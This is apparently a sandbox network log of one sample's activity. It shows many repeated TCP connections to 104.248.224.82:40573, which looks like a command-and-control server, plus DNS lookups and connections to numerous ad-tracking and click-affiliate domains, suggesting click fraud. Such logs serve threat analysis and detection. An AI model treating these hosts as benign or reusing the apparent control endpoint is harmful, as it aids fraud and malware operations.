US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 go-rilla.go2affise.com udp
NL 213.227.134.202:443 go-rilla.go2affise.com tcp
US 8.8.8.8:53 app.adjust.com udp
DE 185.151.204.14:443 app.adjust.com tcp
US 8.8.8.8:53 wagawin.g2afse.com udp
NL 212.32.252.69:443 wagawin.g2afse.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 click-event.wuzztrack.com udp
IE 54.76.117.234:443 click-event.wuzztrack.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 api.bdisl.com udp
US 8.8.8.8:53 www.ghastrk.com udp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 t.9696.me udp
NL 212.7.209.75:443 t.9696.me tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 apps-meg.com udp
US 34.102.236.193:443 apps-meg.com tcp
US 8.8.8.8:53 spykemedia.g2afse.com udp
NL 213.227.156.11:443 spykemedia.g2afse.com tcp
US 8.8.8.8:53 c.netund.com udp
US 52.72.227.129:443 c.netund.com tcp
US 8.8.8.8:53 purifydigital.go2affise.com udp
NL 213.227.135.209:443 purifydigital.go2affise.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
NL 212.7.209.75:443 t.9696.me tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
NL 213.227.135.209:443 purifydigital.go2affise.com tcp
US 8.8.8.8:53 mobtrio.g2afse.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
NL 212.32.252.71:443 mobtrio.g2afse.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
NL 65.9.83.34:443 m5i6q.app.link tcp
US 8.8.8.8:53 click2.knmasdfsdgs.com udp
US 79.141.163.83:443 click2.knmasdfsdgs.com tcp
US 8.8.8.8:53 app.adjust.com udp
DE 185.151.204.6:443 app.adjust.com tcp
US 8.8.8.8:53 vexacion.com udp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 8.8.8.8:53 app.adjust.com udp
US 8.8.8.8:53 cpi-offers.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
DE 52.58.210.58:443 cpi-offers.com tcp
DE 185.151.204.10:443 app.adjust.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 365shoppingdays.com udp
US 8.8.8.8:53 www.onlinecasinoground.nl udp
US 172.67.168.120:443 365shoppingdays.com tcp
US 172.67.72.99:443 www.onlinecasinoground.nl tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 purifydigital.g2afse.com udp
NL 213.227.134.242:443 purifydigital.g2afse.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 www.aawrnstrk.com udp
SG 172.104.40.4:80 offersix.info tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 click.kanmobi.net udp
US 35.241.13.125:443 click.kanmobi.net tcp
US 8.8.8.8:53 www.nextdoor-test.com udp
US 8.8.8.8:53 365shoppingdays.com udp
N/A 10.32.16.231:443 www.nextdoor-test.com tcp
US 104.21.46.118:443 365shoppingdays.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 8.8.8.8:53 view.adjust.com udp
SG 172.104.40.4:80 offersix.info tcp
SG 172.104.40.4:80 offersix.info tcp
DE 185.151.204.50:443 view.adjust.com tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 giftsendmedia.com udp
US 172.67.128.160:80 giftsendmedia.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 view.adjust.com udp
US 8.8.8.8:53 api.bdisl.com udp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
DE 185.151.204.50:443 view.adjust.com tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.6.191:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 104.248.224.82:40573 tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.76:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.43:443 impression.appsflyer.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 104.250.148.146:80 api.bdisl.com tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 api.bdisl.com udp
SG 172.104.40.4:80 offersix.info tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.127:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 d.la2-c1cs-ia4.salesforceliveagent.com udp
US 13.109.191.113:443 d.la2-c1cs-ia4.salesforceliveagent.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.76:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 impression.appsflyer.com udp
US 104.248.224.82:40573 tcp
NL 65.9.83.127:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
NL 65.9.83.76:443 impression.appsflyer.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
US 104.248.224.82:40573 tcp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.6.191:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.76:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
